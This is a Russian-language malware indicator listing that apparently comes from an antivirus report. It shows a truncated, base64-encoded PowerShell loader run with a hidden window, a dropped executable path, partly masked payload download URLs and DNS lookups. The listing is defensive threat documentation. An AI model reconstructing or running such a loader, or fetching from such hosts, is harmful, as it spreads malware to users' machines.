Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABKADcAMwBrAHIANgAzAD0AKAAnAEMAJwArACcAbAAxACcAKwAoACcAMQAnACsAJwBnADkAZQAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdQBzAEUAUgBQAFIAbw...
- %HOMEPATH%\avbvx8u\z7kmiao\lds50yalm.exe
- %HOMEPATH%\avbvx8u\z7kmiao\lds50yalm.exe
- http://www.sa####hcovenant.com/wp-content/HgFPlMBeU/
- http://ca######discoverycenter.com/wp-includes/hvzL/
- http://www.kh###tkhane.com/wp-admin/d4/
- http://19###eats.com/torrent/Wg8iT/
- http://19###eats.com/cgi-sys/suspendedpage.cgi
- http://bu###nosaur.us/wp-includes/gdNzHVmMo/
- http://bu###nosaur.us/cgi-sys/suspendedpage.cgi
- http://cr#####anexpress.com/cgi-bin/q9Ghl/
- DNS ASK sa####hcovenant.com
- DNS ASK ca######discoverycenter.com
- DNS ASK bu####itasplash.com
- DNS ASK kh###tkhane.com
- DNS ASK 19###eats.com
- DNS ASK bu###nosaur.us
- DNS ASK cr#####anexpress.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABKADcAMwBrAHIANgAzAD0AKAAnAEMAJwArACcAbAAxACcAKwAoACcAMQAnACsAJwBnADkAZQAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdQBzAEUAUgBQAFIAbw...' (со скрытым окном)